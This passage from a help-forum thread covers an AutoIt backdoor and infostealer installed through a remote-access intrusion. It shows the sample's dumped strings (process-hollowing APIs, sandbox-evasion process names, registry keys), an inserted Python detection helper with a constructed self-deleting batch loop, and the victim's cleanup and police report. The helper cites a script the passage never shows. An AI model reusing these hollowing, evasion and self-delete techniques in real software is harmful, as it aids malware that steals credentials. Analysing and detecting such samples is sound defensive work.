10=word Magic;byte MajorLinkerVersion;byte MinorLinkerVersion;dword SizeOfCode;dword SizeOfInitializedData;dword SizeOfUninitializedData;dword AddressOfEntryPoint;dword BaseOfCode;uint64 ImageBase;dword SectionAlignment;dword FileAlignment;word MajorOperatingSystemVersion;word MinorOperatingSystemVersion;word MajorImageVersion;word MinorImageVersion;word MajorSubsystemVersion;word MinorSubsystemVersion;dword Win32VersionValue;dword SizeOfImage;dword SizeOfHeaders;dword CheckSum;word Subsystem;word DllCharacteristics;uint64 SizeOfStackReserve;uint64 SizeOfStackCommit;uint64 SizeOfHeapReserve;uint64 SizeOfHeapCommit;dword LoaderFlags;dword NumberOfRvaAndSizes
11=char Name[8];dword UnionOfVirtualSizeAndPhysicalAddress;dword VirtualAddress;dword SizeOfRawData;dword PointerToRawData;dword PointerToRelocations;dword PointerToLinenumbers;word NumberOfRelocations;word NumberOfLinenumbers;dword Characteristics
12=byte InheritedAddressSpace;byte ReadImageFileExecOptions;byte BeingDebugged;byte Spare;ptr Mutant;ptr ImageBaseAddress;ptr LoaderData;ptr ProcessParameters;ptr SubSystemData;ptr ProcessHeap;ptr FastPebLock;ptr FastPebLockRoutine;ptr FastPebUnlockRoutine;dword EnvironmentUpdateCount;ptr KernelCallbackTable;ptr EventLogSection;ptr EventLog;ptr FreeList;dword TlsExpansionCounter;ptr TlsBitmap;dword TlsBitmapBits[2];ptr ReadOnlySharedMemoryBase;ptr ReadOnlySharedMemoryHeap;ptr ReadOnlyStaticServerData;ptr AnsiCodePageData;ptr OemCodePageData;ptr UnicodeCaseTableData;dword NumberOfProcessors;dword NtGlobalFlag;byte Spare2[4];int64 CriticalSectionTimeout;dword HeapSegmentReserve;dword HeapSegmentCommit;dword HeapDeCommitTotalFreeThreshold;dword HeapDeCommitFreeBlockThreshold;dword NumberOfHeaps;dword MaximumNumberOfHeaps;ptr ProcessHeaps;ptr GdiSharedHandleTable;ptr ProcessStarterHelper;ptr GdiDCAttributeList;ptr LoaderLock;dword OSMajorVersion;dword OSMinorVersion;dword OSBuildNumber;dword OSPlatformId;dword ImageSubSystem;dword ImageSubSystemMajorVersion;dword ImageSubSystemMinorVersion;dword GdiHandleBuffer[34];dword PostProcessInitRoutine;dword TlsExpansionBitmap;byte TlsExpansionBitmapBits[128];dword SessionId
13=bool
14=ptr
15=dword a; dword b
16=word[
17=CloseHandle
18=ReadProcessMemory
19=WriteProcessMemory
20=CreateProcessW
21=IsWow64Process
22=TerminateProcess
23=GetThreadContext
24=NtUnmapViewOfSection
25=VirtualAllocEx
26=
27=user32.dll
28=CallWindowProc
29=none
30=byte[
31=msmsgs.exe
32=reader_sl.exe
33=alg.exe
34=wscntfy.exe
35=HKEY_CLASSES_ROOT\http\shell\open\command
36=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
37=HKEY_CLASSES_ROOT\shell\open\command
38=\Microsoft.NET\Framework\
39=\vbc.exe
40=[\\/:><\|]|(?s)^\s*$
41=[\\/]+$
42=SandboxieRpcSs.exe
43=SandboxieDcomLaunch.exe
44=:Zone.Identifier:
45=DATA

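As an added example (not code from this thread, the poster, or the analysed sample), a small Python triage helper that checks constructed host artefacts for the traits the posted loader exhibits: the HKCU Run value named "cmd", a hidden+system exe staged under AppData or Temp, a numeric-named self-delete .bat in Temp, and a .NET vbc.exe running with no compiler arguments. The empty-command-line trait is an assumption drawn from the CreateProcessW call in the script above; all sample data is constructed.

```python
import re

# Traits taken from the posted AutoIt loader (constructed detection logic,
# not the forum's or the sample's code):
#  - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run value "cmd" that
#    points at the loader ($CmdLine[1]) and is re-written every 100 ms
#  - loader file set to hidden+system (FileSetAttrib "+SH") and staged under
#    @AppDataDir or @TempDir
#  - hollowing host: <.NETFramework InstallRoot>\v4.0.*\vbc.exe (or v2.0.*),
#    started via CreateProcessW with an empty command line (assumption: a
#    genuine compiler run always carries arguments)
#  - self-delete helper: @TempDir\<50..100>.bat containing ":loop"/"goto loop"

RUN_VALUE_NAME = "cmd"
STAGING_DIR = re.compile(r"\\AppData\\(Roaming|Local\\Temp)\\", re.IGNORECASE)
VBC_HOST = re.compile(r"\\Microsoft\.NET\\Framework(64)?\\v[24]\.0\.\d+\\vbc\.exe$",
                      re.IGNORECASE)
SELF_DELETE_BAT = re.compile(r"\\Temp\\\d{2,3}\.bat$", re.IGNORECASE)


def check_run_values(values):
    """values: {value_name: data} exported from the HKCU ...\\Run key."""
    findings = []
    for name, data in values.items():
        if name.lower() == RUN_VALUE_NAME:
            findings.append(f"Run value named '{name}' (name used by the sample) -> {data}")
        elif data.lower().endswith(".exe") and STAGING_DIR.search(data):
            findings.append(f"Run value '{name}' starts an exe from a staging dir -> {data}")
    return findings


def check_file(path, attrs):
    """attrs: attribute letters as printed by `attrib`, e.g. 'SH' or 'A'."""
    letters = attrs.upper()
    if "S" in letters and "H" in letters and path.lower().endswith(".exe") \
            and STAGING_DIR.search(path):
        return f"hidden+system exe in staging dir: {path}"
    return None


def check_bat(path, content):
    """Flags the numeric-named delete loop the loader writes before exiting."""
    body = content.lower()
    if SELF_DELETE_BAT.search(path) and ":loop" in body and "goto loop" in body \
            and "del " in body:
        return f"self-delete loop batch: {path}"
    return None


def check_processes(procs):
    """procs: list of (image_path, command_line) pairs from a process listing."""
    findings = []
    for image, cmdline in procs:
        bare = cmdline.strip().strip('"')
        if VBC_HOST.search(image) and bare in ("", image):
            findings.append(f"vbc.exe with no compiler arguments (possible hollowing host): {image}")
    return findings


def triage(run_values, files, bats, procs):
    """Runs all checks and returns the combined list of findings."""
    findings = check_run_values(run_values)
    findings += [f for f in (check_file(p, a) for p, a in files) if f]
    findings += [f for f in (check_bat(p, c) for p, c in bats) if f]
    findings += check_processes(procs)
    return findings


# Constructed sample host state (not data from the thread).
SAMPLE_RUN = {
    "cmd": r"C:\Users\admin\AppData\Roaming\svc.exe",
    "OneDrive": r"C:\Users\admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background",
}
SAMPLE_FILES = [
    (r"C:\Users\admin\AppData\Roaming\svc.exe", "SH"),
    (r"C:\Program Files\Editor\editor.exe", "A"),
]
SAMPLE_BATS = [
    (r"C:\Users\admin\AppData\Local\Temp\73.bat",
     ':loop\r\ndel "C:\\Users\\admin\\Downloads\\invoice.exe"\r\n'
     'if exist "C:\\Users\\admin\\Downloads\\invoice.exe" goto loop\r\n'
     'del C:\\Users\\admin\\AppData\\Local\\Temp\\73.bat'),
    (r"C:\Users\admin\AppData\Local\Temp\build.bat", "msbuild proj.sln"),
]
SAMPLE_PROCS = [
    (r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe", ""),
    (r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe",
     r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" /noconfig @C:\tmp\args.rsp'),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_RUN, SAMPLE_FILES, SAMPLE_BATS, SAMPLE_PROCS):
        print(finding)
```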

schrauber 09.08.2015 07:33

forwarded the file :)

FabulousGee 09.08.2015 14:57

Thanks. Curious to see what comes out of it.

In the meantime I have also found another clue:
AutoIt approach: Infecting your browser via code recycling - hxxp://now.avg.com/autoit-approach-infecting-browser-code-recycling/

Looks very much like a similar attack. That means it was probably only after further credentials and less after "real" data.
If that were actually certain, the worst would already be over^^

schrauber 10.08.2015 09:33

yes, it will be something like that.

FabulousGee 15.08.2015 00:34

Did anything come out of the forwarding, or where did you forward it to? :)

A report has been filed with the cybercrime department of the criminal police, but we shouldn't get our hopes up because the IP apparently comes from England... The company TeamViewer, by the way, was very eager to provide unbureaucratic help (as far as possible) - top!

Passwords had all been changed anyway, and I was able to remove the malicious file fairly well (out of autostart, delete the created temp files, reboot and then the .exe and everything that didn't work before...). So far so clean, I couldn't find any remnants.

schrauber 15.08.2015 20:21

nope, no info yet, but I asked again :)

schrauber 15.08.2015 20:42

Is now also detected by VT:

https://www.virustotal.com/en-gb/fil...is/1439667491/


Backdoor with InfoStealer.


Copyright ©2000-2025, Trojaner-Board